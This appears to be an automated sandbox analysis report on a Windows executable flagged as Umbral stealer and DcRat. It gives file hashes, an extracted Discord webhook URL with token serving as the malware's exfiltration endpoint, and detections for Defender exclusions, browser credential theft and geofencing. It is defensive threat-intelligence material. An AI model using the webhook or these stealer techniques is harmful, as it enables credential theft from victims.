General

  • Target

    898a94f29edc228ce3bd2054f3d5d6dd.bin

  • Size

    3.6MB

  • Sample

    240505-bvm8bade58

  • MD5

    113d95e01eca6b087685fd31d893067d

  • SHA1

    5946a14101c4c6421dbba75ac436d46a48a90756

  • SHA256

    4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7

  • SHA512

    949f38260d74e1e10327cf225d8781ced706572ede98a32dfeee6bd12d32dd2c354f0d0ff24fae3ff6b02cf285afbba8456987735ef2e5af81fd54bd5bda0858

  • SSDEEP

    98304:+Yt7aeUqcE/zM0KJ3UCACEuvS67P1ZwtzKDIXp7Qnb:T7PUqlLVKJkvCEua6IoMXp7Qb

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1229451067175997500/jIKKpDize9BATyGRwJszp_dngrLcH2ykCNVKA2g8DaU3tS2rFJtimCYVQM10Zmvy_yF-

Targets

    • Target

      a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

    • Size

      4.3MB

    • MD5

      898a94f29edc228ce3bd2054f3d5d6dd

    • SHA1

      f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

    • SHA256

      a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

    • SHA512

      8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

    • SSDEEP

      49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

    • DcRat

      DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Detect Umbral payload

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Umbral

      Umbral stealer is an opensource moduler stealer written in C#.

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Disables Task Manager via registry modification

    • Drops file in Drivers directory

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

MITRE ATT&CK Enterprise v15

Tasks